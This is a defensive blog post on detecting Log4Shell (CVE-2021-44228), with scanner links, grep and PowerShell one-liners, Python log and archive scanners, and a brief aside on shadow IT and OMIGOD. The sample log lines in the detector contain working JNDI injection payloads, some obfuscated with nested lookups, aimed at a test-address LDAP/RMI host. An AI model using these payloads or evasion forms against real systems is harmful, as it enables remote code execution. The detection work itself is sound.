Wednesday, 15 December 2021

Critical vulnerability in Apache Log4j | LOG4J (Resources for detection)


LOG4J (Resources for detection of CVE-2021-44228 / Log4Shell):

==========================

Automatic approach:

--------------------------------------

1. Nmap (NSE script): https://github.com/Diverto/nse-log4shell


2. Burp Suite (Log4Shell Scanner extension): https://portswigger.net/bappstore/b011be53649346dd87276bca41ce8e8f


3. log4shell-detector (log scanner that handles obfuscated payloads): https://github.com/Neo23x0/log4shell-detector


4. log4j-finder (file-system scanner, also looks inside nested archives): https://github.com/fox-it/log4j-finder


Manual approach:

--------------------------------------

Command 1 : uncompressed logs

$ sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/' /var/log

Command 2 : rotated .gz logs

$ sudo find /var/log -name '*.gz' -print0 | xargs -0 zgrep -E -i '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/'

Command 3 : strips the ${lower:...} wrapper before matching

$ sudo find /var/log/ -type f -exec sh -c 'sed -e "s/\${lower://g" "$1" | tr -d "}" | egrep -I -i "jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):"' sh {} \;

Command 4 : same, for .gz files

$ sudo find /var/log/ -name '*.gz' -type f -exec sh -c 'zcat "$1" | sed -e "s/\${lower://g" | tr -d "}" | egrep -i "jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):"' sh {} \;

Notes on the commands:

- The trailing `[^\n]+` from the widely copied version of these patterns is dropped. Inside a bracket expression `\n` is not a newline but the two characters `\` and `n`, so all it did was require one more character that is neither; it added nothing to the match.
- The file name is passed to `sh -c` as `$1` instead of being spliced into the command string with `{}`. Splicing lets a crafted file name (one containing quotes or `$(...)`) run commands as root.
- Commands 3 and 4 only unwrap `${lower:`. Payloads assembled from `${upper:...}`, `${::-j}` or `${env:NaN:-j}` pieces are still missed, which is what log4shell-detector (item 3 above) is for.
- A hit only shows that an attempt was logged. It says nothing about whether the request reached a vulnerable Log4j, and an absence of hits says nothing about attempts that were not logged.
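The following is an added example, not code from the page or from any of the tools listed above: a small Python detector that does what commands 1 to 4 do, plus the normalisation they lack. It percent-decodes each line and then resolves the `${lower:}`, `${upper:}` and `${...:-default}` lookups from the inside out until the line is stable, so a payload split into `${::-j}${::-n}${::-d}${::-i}` pieces collapses back to `${jndi:...}` before the search. The log lines are constructed for the demo (RFC 5737 test addresses) and the function names are my own.

```python
import re
from urllib.parse import unquote

# Lookups attackers wrap around a payload so that "${jndi:" never appears
# literally. Innermost ones are resolved first, repeatedly, until stable.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${::-x}, ${env:NOPE:-x}, ${sys:NOPE:-x} ... all evaluate to the default "x"
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")

# What commands 1-4 above look for, applied after normalisation
JNDI_RE = re.compile(r"jndi:(ldaps?|rmi|dns|nis|iiop|corba|nds|http):/", re.IGNORECASE)
# The literal pattern of commands 1 and 2, kept for comparison
NAIVE_RE = re.compile(r"\$(\{|%7B)jndi:(ldaps?|rmi|dns|nis|iiop|corba|nds|http):/", re.IGNORECASE)


def normalize(line: str, max_rounds: int = 20) -> str:
    """Percent-decode, then peel obfuscation lookups from the inside out."""
    s = unquote(line)
    for _ in range(max_rounds):
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def scan_lines(lines):
    """(1-based line number, normalised text) for every line carrying a JNDI lookup."""
    hits = []
    for no, line in enumerate(lines, 1):
        norm = normalize(line)
        if JNDI_RE.search(norm):
            hits.append((no, norm))
    return hits


def naive_hits(lines):
    """Line numbers the plain grep of commands 1 and 2 would report."""
    return [no for no, line in enumerate(lines, 1) if NAIVE_RE.search(line)]


# Constructed access-log lines (RFC 5737 test addresses), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.7 - - [10/Dec/2021:14:02:13 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.23%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.68.0"',
    '10.0.0.8 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}ndi:rmi://198.51.100.23/x}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.23/x}"',
    '10.0.0.10 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 12 "-" "${${env:NaN:-j}ndi${env:NaN:-:}ldap://198.51.100.23/x}"',
    '10.0.0.11 - - [10/Dec/2021:14:02:17 +0000] "GET /docs/log4j-jndi-lookup-disabled HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for no, norm in scan_lines(SAMPLE_LOG):
        print(f"line {no}: {norm}")
    print("plain grep would only flag lines:", naive_hits(SAMPLE_LOG))
```

On the sample, the normalised scan flags lines 1, 3, 4, 5 and 6 while the literal pattern of commands 1 and 2 flags only line 1: the `%7B` alternative in that pattern does not help once the colon is encoded as `%3A` too. Keep the round limit; a line can otherwise be built to expand forever.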


Command 5 : Windows (PowerShell)

gci 'C:\' -rec -force -include *.jar,*.war,*.ear -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path

This lists every archive whose zip directory names JndiLookup.class in clear text (the original one-liner only looked at *.jar; .war and .ear files are added here). Two caveats: an archive nested inside another one and stored compressed is not visible to a text search of the outer file, and the presence of the class is not by itself proof of an exploitable version, since fixed releases from 2.16.0 on still ship it and removing it from the jar was a manual mitigation. log4j-finder (item 4 above) reports the version and descends into nested archives.
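As an added example, not taken from the page or from log4j-finder, the following Python does what the PowerShell one-liner does but properly: it opens each archive as a zip, reads the log4j-core version from the Maven pom.properties, checks for JndiLookup.class, and recurses into nested .jar/.war/.ear/.zip entries. The archives it scans are constructed in memory with dummy class bytes; `needs_attention` encodes the fixed-version lines from the Apache Log4j security advisories (2.16.0 and later, plus the 2.12.2+ and 2.3.1+ backports) as a triage rule only. Function names and the sample layout are my own.

```python
import io
import os
import zipfile

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def _version_from_pom(data: bytes):
    """Pull 'version=...' out of a Maven pom.properties."""
    for raw in data.decode("utf-8", "replace").splitlines():
        if raw.strip().startswith("version="):
            return raw.strip().split("=", 1)[1]
    return None


def scan_archive(blob: bytes, path: str, findings=None):
    """Record every log4j-core in an archive or in any archive nested in it.
    A finding carries the archive path (nested entries joined with '!'), the
    Maven version when pom.properties exists, and whether JndiLookup.class exists."""
    if findings is None:
        findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = zf.namelist()
        version = _version_from_pom(zf.read(POM_PROPS)) if POM_PROPS in names else None
        has_jndi = JNDI_LOOKUP in names
        if version is not None or has_jndi:
            findings.append({"path": path, "version": version, "jndi_lookup": has_jndi})
        for name in names:  # descend into fat jars, wars, ears
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(zf.read(name), f"{path}!{name}", findings)
    return findings


def scan_tree(root: str):
    """Walk a directory and scan every archive in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, f)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, findings)
    return findings


def _parse(version: str):
    try:
        return tuple(int(p) for p in version.split(".")[:3])
    except ValueError:
        return None


def needs_attention(finding) -> bool:
    """Triage rule, not a verdict: JndiLookup present and the version unknown,
    or a 2.x below 2.16.0 outside the 2.12.2+ / 2.3.1+ backport lines."""
    if not finding["jndi_lookup"]:
        return False
    v = _parse(finding["version"]) if finding["version"] else None
    if v is None:
        return True
    if v >= (2, 16, 0):
        return False
    if v[:2] == (2, 12) and v >= (2, 12, 2):
        return False
    if v[:2] == (2, 3) and v >= (2, 3, 1):
        return False
    return True


def _make_jar(entries, compress=zipfile.ZIP_STORED) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data, compress_type=compress)
    return buf.getvalue()


def build_samples():
    """Constructed archives for the demo; the .class payloads are dummy bytes."""
    def props(v):
        return f"version={v}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n".encode()
    vulnerable = _make_jar({POM_PROPS: props("2.14.1"), JNDI_LOOKUP: b"\xca\xfe\xba\xbe"})
    stripped = _make_jar({POM_PROPS: props("2.14.1")})  # class deleted, as the zip -d mitigation does
    fixed = _make_jar({POM_PROPS: props("2.17.1"), JNDI_LOOKUP: b"\xca\xfe\xba\xbe"})
    # fat application jar with the vulnerable core nested and deflated, so its
    # entry names are not visible to a plain text search of the outer file
    app = _make_jar({"BOOT-INF/classes/app/Main.class": b"\xca\xfe\xba\xbe",
                     "BOOT-INF/lib/log4j-core-2.14.1.jar": vulnerable}, zipfile.ZIP_DEFLATED)
    return {"log4j-core-2.14.1.jar": vulnerable, "log4j-core-2.14.1-stripped.jar": stripped,
            "log4j-core-2.17.1.jar": fixed, "app.jar": app}


if __name__ == "__main__":
    for name, blob in build_samples().items():
        for f in scan_archive(blob, name):
            print(f["path"], f["version"], "JndiLookup" if f["jndi_lookup"] else "-",
                  "ATTENTION" if needs_attention(f) else "ok")
```

Run `scan_tree("/")` (or a drive root on Windows) for a real host. The stripped 2.14.1 sample shows why the version alone is not enough either: a jar that had the class removed reads as an old version but no longer carries the lookup.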

Vulnerable software list (maintained by NCSC-NL): https://github.com/NCSC-NL/log4shell/tree/main/software



Wednesday, 15 September 2021

IoT security attack surface

Shadow IT in cloud computing

Shadow SaaS

An unapproved cloud application that is connected in some way (usually via API) to the organization's SaaS or IaaS, with access to corporate data but without the organization's permission.

When a cloud provider installs agents on a customer's servers without asking, is that a security breach or a compliance issue?

For example: Microsoft Azure silently installs the Open Management Infrastructure (OMI) agent on its Linux virtual machines as a side effect of enabling services such as Log Analytics or Azure Automation, and that agent turned out to have RCE and LPE vulnerabilities (the "OMIGOD" bugs; the unauthenticated RCE is CVE-2021-38647, fixed in OMI 1.6.8-1). #OMIGOD